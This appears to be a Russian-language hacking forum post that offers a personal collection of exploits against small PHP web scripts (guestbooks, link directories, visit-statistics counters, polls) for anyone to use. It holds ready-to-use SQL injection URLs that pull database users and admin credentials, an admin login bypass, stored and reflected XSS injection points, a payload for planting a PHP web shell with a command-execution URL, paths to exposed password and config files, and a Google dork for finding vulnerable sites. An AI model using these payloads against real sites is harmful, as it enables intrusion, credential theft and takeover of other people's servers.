![]() |
В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.
|
siteframe SQL inj
http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATAB ASE(),0x3a,USER())/* Скромно, но полезно :) |
WR-Guest 1.0
Активная XSS: При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений. |
SimPoll v.1.0
Активная XSS: админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта google dork: inurl:test_poll_results.php |
cartkeeper
SQL-inj hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+s elect+1,version(),3,user()/* |
Скрипты статистики посещений:
1. Сервер статистики ГелиоСтат Активная XSS: В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики. 2. pronuserinfoSQL v1.2 Активная XSS: В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики. SQL инъекция: На странице view.php в поле "отследить последних..." вводим: ' union select 1,2,3,4,5,6/* 3. SEbotInfo 2.0 Активная XSS: На странице в sebot.php переменные: HTTP_USER_AGENT вписываем Yandex. HTTP_HOST вписываем тело скрипта. Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php. 4. BotsInfo v0.03 Активная XSS: На странице в write.php переменные: HTTP_USER_AGENT вписываем Yandex. HTTP_HOST вписываем тело скрипта. Скрипт будет выполняться при просмотре статистики на странице botsinfo.php. |
EJ3 TOP 1.4
Заливка шелла: При добавление ссылки на сайт в поле Banner URL вводим: '; ?> <?php Код шелла ?> <?php $a=' После ввода данных получаем ID: К примеру: 1181902021 Шелл будет доступен по адресу: http://site.ru/data/1181902021info.php http://site.ru/data/[id]info.php ----------------------------------------------------------- Ссылки и каталоги ссылок 1. Link Database SQL инъекция: http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/* 2. Link Up SQL инъекция: http://site.ru/category.php?category=-1+union+select+1,2/* Доступ в админку: http://site.ru/admin/index.php В поле Username вводим: ' or 1=1 /* 3. SM(links) v2.0 Отсутствие .htaccess: Смотрим файл config.inc - в нём хранятся логин и пароль к админке: http://site.ru/config.inc 4. xLink v2.1 Пассивная XSS: http://site.ru/poisk.php?poisk='><script>alert();</script> 5. My Link 1.00 Активная XSS: При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок. 6. Quick Link Активная XSS: При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок. |
scozbook 1.1
Код:
http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58),adminpass,char(58),adminemail)+using+cp1251),3,4,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/* |
Гостевые книги:
FastStarter Активная XSS: Вписываем скрипт в поле name. Mandralivre 4.1 Активные XSS: Вписываем скрипт в поля Votre nom, Votre email, Votre site web. hwdeGUEST 2.0 Активная XSS: Вписываем скрипт в поле Name. |
Закрытая гостевая книга v 1.0 (websmith)
вход в админку без пароля Код:
www.site.ru/admin/index.php_________________ guest v1.1 если криво настроены права то можно прочитать файл с логином и паролем Код:
www.site.ru/passwd.datPHP код:
пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4 заливка шелла выполняеться из админ панели Код:
http://site.ru/admin.php?designPHP код:
Код:
http://site.ru/design/header.inc.php?cmd=команда |
| Время: 06:05 |